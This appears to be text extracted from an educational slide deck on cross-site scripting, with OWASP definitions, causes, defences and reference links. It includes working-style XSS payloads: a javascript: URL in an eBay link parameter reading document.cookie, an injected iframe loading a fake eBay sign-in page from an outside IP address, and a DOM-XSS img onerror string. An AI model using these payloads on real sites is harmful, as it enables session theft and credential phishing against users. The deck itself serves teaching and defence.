Alert(‘xss’)

OWASPowasp.org

XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

Caused by an application that:

● Fails to properly validate untrusted data.

● Fails to properly encode output data.

Generally an attack against an application’s users, not an application.

Source: http://excess-xss.com/

Source: http://excess-xss.com/

Source: http://excess-xss.com/

Source: http://excess-xss.com/

Source: http://excess-xss.com/

http://ebay.com/link/?nav=webview&url=javascript:

alert(document.cookie)

Note: XSS doesn’t always need a <script> tag to execute.

Bonus Points: What is missing on eBay’s cookies?

document.write(‘<iframe src=”http://45.55.162.179/ebay/signin.

ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″

height=”1000″>’)

http://www.youtube.com/watch?v=WuZ61NWbK_4

Set to automatically retweet via this: data-action:retweet causing a chain event for anyone that logs into TweetDeck.

https://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html

https://xss-doc.appspot.com/demo/3#'><img src=x onerror=alert(/DOM-XSS/)>

https://xss-doc.appspot.com/demo/3#'><img src=x onerror=alert(/DOM-XSS/)>

https://www.google.com/about/appsecurity/learning/xss/

http://gauntlt.org/

https://github.com/gauntlt

DevOps with Pipeline

http://www.youtube.com/watch?v=KMU0tzLwhbE

○○

<%= h foo.bar %>

Server.HtmlEncode(string)

● https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet● https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet